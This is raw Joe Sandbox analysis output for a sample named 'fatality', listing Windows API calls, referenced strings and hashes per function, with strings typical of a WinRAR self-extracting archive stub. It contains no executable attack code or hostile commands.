                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00912641,000000FF), ref: 008FACB5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3861434553-0
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00AC85C3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp, Offset: 0095B000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008FC2B1
                                                                                                                                                            • EndDialog.USER32(?,00000006), ref: 008FC2C4
                                                                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 008FC2E0
                                                                                                                                                            • SetFocus.USER32(00000000), ref: 008FC2E7
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 008FC321
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008FC358
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC404
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 008FC417
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC477
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 008FC48A
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008FC4A7
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC535
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 008FC548
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC59C
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 008FC5AF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow
                                                                                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                            • API String ID: 1203808948-1840816070
                                                                                                                                                            APIs
                                                                                                                                                            • _swprintf.LIBCMT ref: 008EE30E
                                                                                                                                                            • _strlen.LIBCMT ref: 008EE32F
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0091E274,?), ref: 008EE38F
                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008EE3C9
                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 008EE3D5
                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008EE475
                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008EE4A2
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008EE4DB
                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 008EE4E3
                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 008EE4EE
                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008EE51B
                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 008EE58D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Rect$Text$ClientItemLongMetricsSystem_strlen_swprintf
                                                                                                                                                            • String ID: $%s:$CAPTION$d
                                                                                                                                                            • API String ID: 1208408182-2512411981
                                                                                                                                                            • Opcode ID: 9e326049135437ba88b8828af9878c1ad78060aa0289f73c82e0b610919dd456
                                                                                                                                                            • Instruction ID: b5fe9336424420a3da86f915c3c4e14aaa6e373eb9db4613d325640f174b200a
                                                                                                                                                            • Opcode Fuzzy Hash: 9e326049135437ba88b8828af9878c1ad78060aa0289f73c82e0b610919dd456
                                                                                                                                                            • Instruction Fuzzy Hash: 99819F72208341AFD710DF69CC89E6BBBE9FBCA704F04491DFA84D7291D631E9058B52
                                                                                                                                                            APIs
                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0090CB66
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C71E
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C730
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C742
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C754
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C766
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C778
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C78A
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C79C
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7AE
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7C0
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7D2
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7E4
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7F6
                                                                                                                                                            • _free.LIBCMT ref: 0090CB5B
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 0090CB7D
                                                                                                                                                            • _free.LIBCMT ref: 0090CB92
                                                                                                                                                            • _free.LIBCMT ref: 0090CB9D
                                                                                                                                                            • _free.LIBCMT ref: 0090CBBF
                                                                                                                                                            • _free.LIBCMT ref: 0090CBD2
                                                                                                                                                            • _free.LIBCMT ref: 0090CBE0
                                                                                                                                                            • _free.LIBCMT ref: 0090CBEB
                                                                                                                                                            • _free.LIBCMT ref: 0090CC23
                                                                                                                                                            • _free.LIBCMT ref: 0090CC2A
                                                                                                                                                            • _free.LIBCMT ref: 0090CC47
                                                                                                                                                            • _free.LIBCMT ref: 0090CC5F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap___free_lconv_mon
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 358854727-0
                                                                                                                                                            • Opcode ID: ec37ae505227b61060dcd4472ddef2b7d38f6641a876cfc952d733aeb6bbf2c9
                                                                                                                                                            • Instruction ID: 91d9b8887fbe2b2ea84bd1b93355e66859d2fcc1a33f2ae885b228edd4bfeb8f
                                                                                                                                                            • Opcode Fuzzy Hash: ec37ae505227b61060dcd4472ddef2b7d38f6641a876cfc952d733aeb6bbf2c9
                                                                                                                                                            • Instruction Fuzzy Hash: 6D313BB16003069FEB21AB78D84AB5BB7E9AF90310F145A29E59DD71D2DF75EC80CB10
                                                                                                                                                            APIs
                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 008FD6C1
                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 008FD6ED
                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008FD709
                                                                                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008FD720
                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 008FD734
                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008FD75D
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 008FD764
                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 008FD76D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                            • String ID: STATIC
                                                                                                                                                            • API String ID: 2845197485-1882779555
                                                                                                                                                            • Opcode ID: 8197e09ef4d688a01f824bac42aace3215557b6466ddb9b8a3b79f2a3a86e00c
                                                                                                                                                            • Instruction ID: ae4078068fd5226ce8245b24e5f7c416f504feb27f86b76be49381455635ba99
                                                                                                                                                            • Opcode Fuzzy Hash: 8197e09ef4d688a01f824bac42aace3215557b6466ddb9b8a3b79f2a3a86e00c
                                                                                                                                                            • Instruction Fuzzy Hash: 881136762183187BE221BB749C4AFBF775DFF59711F10C220FB01E6091DA64CA0552A2
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: 0774f3f2524db687f91a1278c58bc0a97c4c04b0e27724d153f6104ebb0db768
                                                                                                                                                            • Instruction ID: 121c4f09e783c2abd8314426b14d5bfd67465a234cbc8013d67b334b2b1cf34e
                                                                                                                                                            • Opcode Fuzzy Hash: 0774f3f2524db687f91a1278c58bc0a97c4c04b0e27724d153f6104ebb0db768
                                                                                                                                                            • Instruction Fuzzy Hash: 7911D47622010AAFCB01EF54C846EDA3BB5EF54350F0156A0FA488F2E2DE32DA509B84
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FB610
                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 008FB637
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008FB650
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008FB661
                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 008FB66A
                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008FB67E
                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008FB694
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                            • String ID: LICENSEDLG
                                                                                                                                                            • API String ID: 3214253823-2177901306
                                                                                                                                                            • Opcode ID: a7fe7eceea73e3895d92a1076adbc5e442ac4764e4ff21d0c328ef984f1c7edf
                                                                                                                                                            • Instruction ID: a45e415fd2cdb4c7e687c822a7cdfc9600ed925dea558b4514d104e5a9f7f77d
                                                                                                                                                            • Opcode Fuzzy Hash: a7fe7eceea73e3895d92a1076adbc5e442ac4764e4ff21d0c328ef984f1c7edf
                                                                                                                                                            • Instruction Fuzzy Hash: 5421D33266C20CBBD2115B76EC49F3B3B6DFB5BB85F018014F740D60A0CB569901AA31
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E6FAA
                                                                                                                                                            • _wcslen.LIBCMT ref: 008E7013
                                                                                                                                                            • _wcslen.LIBCMT ref: 008E7084
                                                                                                                                                              • Part of subcall function 008EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,008E977F,?,?,008E95CF,00000000,00912641,000000FF), ref: 008EA1F1
                                                                                                                                                              • Part of subcall function 008E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 008E9E70
                                                                                                                                                              • Part of subcall function 008E9620: CloseHandle.KERNELBASE(000000FF,?,?,008E95D6,00000000,00912641,000000FF), ref: 008E963B
                                                                                                                                                              • Part of subcall function 008EA4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,008EA325,00000001,008E70E6,?,008EA175,?,00000001,00000000,?,?), ref: 008EA501
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$_wcslen$AttributesCloseDeleteH_prologHandleTime
                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                            • API String ID: 449284102-3508440684
                                                                                                                                                            • Opcode ID: 2e5e4e5a3ffdf945389d5d97d496f6bfe7efa212279487398e99b19ea19a9aef
                                                                                                                                                            • Instruction ID: 80d59c4cebb5bf04642463a5a129878f27dc379a908c39ec9f413e713898371b
                                                                                                                                                            • Opcode Fuzzy Hash: 2e5e4e5a3ffdf945389d5d97d496f6bfe7efa212279487398e99b19ea19a9aef
                                                                                                                                                            • Instruction Fuzzy Hash: 2EC1E671A04688AEDB25DB75DC41FEEB7B8FF16300F004559FA56E3282D770AA44CB62
                                                                                                                                                            APIs
                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00902F50
                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0090305E
                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 009031B0
                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 009031CB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 2751267872-393685449
                                                                                                                                                            • Opcode ID: 2dcfdf4ca9a84a02796da274314605ba7855b49495fff76d8e0e4c29ad8e175a
                                                                                                                                                            • Instruction ID: 2c15a0912a87cfa13e763f59a7676fd48a83bd5ca1c3cbba9d0902b3c2898508
                                                                                                                                                            • Opcode Fuzzy Hash: 2dcfdf4ca9a84a02796da274314605ba7855b49495fff76d8e0e4c29ad8e175a
                                                                                                                                                            • Instruction Fuzzy Hash: DFB18C71900209EFCF25DFA4C885AAEBBBDFF48310F14855AE8056B292D731DA52CF91
                                                                                                                                                            APIs
                                                                                                                                                            • _wcslen.LIBCMT ref: 008F9736
                                                                                                                                                            • _wcslen.LIBCMT ref: 008F97D6
                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008F982D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen$CreateGlobalStream
                                                                                                                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                            • API String ID: 1938992887-4209811716
                                                                                                                                                            • Opcode ID: dc53a8b291a2632535edcf73784155d2c666454219ecc8d734fa4defab056984
                                                                                                                                                            • Instruction ID: 1e10974380862105a12d387f260a545d2ca7f17484437609fb51fb8a5d5e58c9
                                                                                                                                                            • Opcode Fuzzy Hash: dc53a8b291a2632535edcf73784155d2c666454219ecc8d734fa4defab056984
                                                                                                                                                            • Instruction Fuzzy Hash: F53157326183097FD725AF74DC06FBB779CEF82364F10411DF642D61C2EB609A4482A6
                                                                                                                                                            APIs
                                                                                                                                                            • _swprintf.LIBCMT ref: 008E2536
                                                                                                                                                              • Part of subcall function 008F05DA: _wcslen.LIBCMT ref: 008F05E0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf_wcslen
                                                                                                                                                            • String ID: ;%u$x%u$xc%u
                                                                                                                                                            • API String ID: 2292043294-2277559157
                                                                                                                                                            • Opcode ID: 59d6dcf550f11a5224f51d509546649945ada216990e0743deccef8ae0e57e0f
                                                                                                                                                            • Instruction ID: 2cc2fbb16a55d48249a0d167523ae59601b3eafb580755027bc0385ca9f9dd01
                                                                                                                                                            • Opcode Fuzzy Hash: 59d6dcf550f11a5224f51d509546649945ada216990e0743deccef8ae0e57e0f
                                                                                                                                                            • Instruction Fuzzy Hash: 3CF11970A083C49BDB25DB2A8495BFA7799FF92304F08057DED86DB283CB648945C763
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                            • API String ID: 3519838083-3505469590
                                                                                                                                                            • Opcode ID: 52ae965ef5e68f1a7d09e6d172e515f9935fbca4a1ba01d7309821375da6b92d
                                                                                                                                                            • Instruction ID: 9a8a44a137214639f0f4f15dc904cfcb0787916129efe3cb7098bf9680c4f946
                                                                                                                                                            • Opcode Fuzzy Hash: 52ae965ef5e68f1a7d09e6d172e515f9935fbca4a1ba01d7309821375da6b92d
                                                                                                                                                            • Instruction Fuzzy Hash: 9D718C70B00659AFDB14DFA9CC959AFBBB8FF89714B004559E512E72A0CB30AD41CB60
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                                            • API String ID: 176396367-3568243669
                                                                                                                                                            • Opcode ID: ed49d1af9b1e135b1c82a9c23d25b485952eca92a6b7c0f1cb77ad745234f484
                                                                                                                                                            • Instruction ID: 945adf4f49c796503c15cd866fc6c5461adb56115a923b3801935ef721d52c1e
                                                                                                                                                            • Opcode Fuzzy Hash: ed49d1af9b1e135b1c82a9c23d25b485952eca92a6b7c0f1cb77ad745234f484
                                                                                                                                                            • Instruction Fuzzy Hash: 95511A6674132F95DB30AA39981177673E4FFA5794F79041AFBC1CB1C0FBA58C818262
                                                                                                                                                            APIs
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00902937
                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0090293F
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 009029C8
                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 009029F3
                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00902A48
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                            • Opcode ID: 2385a9f1833397ebc1bed4dc3dd48c73b1de519cc40d880f104191961475cb45
                                                                                                                                                            • Instruction ID: 9d65c54ef10459d9f02c26b2a971966ce23cd3ef06a1f3960faf65ec17611e9b
                                                                                                                                                            • Opcode Fuzzy Hash: 2385a9f1833397ebc1bed4dc3dd48c73b1de519cc40d880f104191961475cb45
                                                                                                                                                            • Instruction Fuzzy Hash: F4418034B00208AFCF14DF68C889A9EBBB9AF84324F14C155E825AB3D2D7719A55CB91
                                                                                                                                                            APIs
                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 008F9EEE
                                                                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 008F9F44
                                                                                                                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 008F9FDB
                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 008F9FE3
                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 008F9FF9
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Show$RectText
                                                                                                                                                            • String ID: RarHtmlClassName
                                                                                                                                                            • API String ID: 3937224194-1658105358
                                                                                                                                                            • Opcode ID: 290ef60bf6d79670f94697746f8b3ec66c0d9be9b31f65f5d347bc0a05b876a3
                                                                                                                                                            • Instruction ID: 92011f52ebdbe69a9181aba912c9ac34684c2079544b1e9121a6486e1d78c715
                                                                                                                                                            • Opcode Fuzzy Hash: 290ef60bf6d79670f94697746f8b3ec66c0d9be9b31f65f5d347bc0a05b876a3
                                                                                                                                                            • Instruction Fuzzy Hash: 7941BE7500C218EFCB215F74DC48F6BBBA8FB89715F008559FA4ADA056CB34E904DB62
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
